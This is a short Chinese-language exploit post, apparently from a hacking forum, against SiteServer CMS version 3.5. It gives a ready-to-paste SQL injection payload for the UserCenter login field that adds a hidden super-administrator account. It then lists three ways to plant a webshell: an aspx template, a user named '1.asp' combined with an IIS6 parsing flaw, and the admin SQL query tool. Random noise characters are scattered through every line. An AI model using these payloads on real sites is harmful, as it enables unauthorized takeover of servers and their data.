经测试秒杀最新的3.5版
8 j% k3 t) X/ E# l |$ ?; Qstieserver官网:www.siteserver.cn3 V! o, p: X p ^) i
EXP:1 j/ N2 k8 ^$ }3 T( g0 c3 ^ k
直接访问UserCenter/login.aspx
U. u. J) s7 H; F& A" t* b用户名处输入:
+ z* V' ]$ J8 i& R
+ v! Y1 A9 J. S123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
) p9 [: Q% B. v V5 v) ]密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
: D( @' t( [. r之后再访问后台SiteServer/login.aspx用插入的用户登陆
/ _8 y& F. W' ^" a. D- E后台拿webshell的三种方法:& b/ t( ]" H6 o2 K+ Z
一、
/ I* r2 ]: y9 \( G1 O1 \站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
: ~" e8 u4 |' O3 P2 e二、- r; i% O' f4 d' s9 F4 b% A
成员权限-》添加用户-》用户名为:1.asp
+ Q; N) u _0 g$ U v! ?http://127.0.0.1/usercenter/
[* B' v% @ }/ g3 v" z& h& N用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
% K8 l9 f% }. g(ps:后台添加用户时不会验证是否含有非法字符)9 H* f" @$ N7 C9 K4 w: {& r' I' i
三、: p' I" A8 D9 m ?9 r2 l
系统工具-》实用工具-》机器参数查看
) b4 u' Q8 \) o; g5 y# o可以看到数据库类型、名称,WEB路径
0 `+ M+ ~: Q3 B. X, _系统工具-》数据库工具-》SQL语句查询
' p5 y& {5 {& S$ s B) ^" |: }这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |